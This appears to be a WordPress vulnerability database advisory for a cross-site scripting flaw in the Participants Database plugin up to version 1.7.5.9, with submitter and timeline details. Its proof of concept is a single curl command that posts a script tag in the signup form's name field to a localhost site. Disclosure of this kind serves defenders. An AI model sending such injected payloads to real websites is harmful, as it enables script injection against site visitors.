WordPress Plugin Vulnerabilities
Participants Database <= 1.7.5.9 - Cross-Site Scripting
Description
Cross site scripting (XSS) vulnerability in the Wordpress Participants
Database plugin 1.7.59 allows attackers to inject arbitrary javascript via
the Name parameter.
Proof of Concept
curl -k -F action=signup -F subsource=participants-database -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F first_name=<script>alert("1");</script> -F last_name=a -F email=a@a.com -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1
Affects Plugins
References
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Submitter
Benjamin Lim
Submitter website
Verified
No
WPVDB ID
Timeline
Publicly Published
2017-09-06 (about 6 years ago)
Added
2017-09-06 (about 6 years ago)
Last Updated
2020-09-22 (about 3 years ago)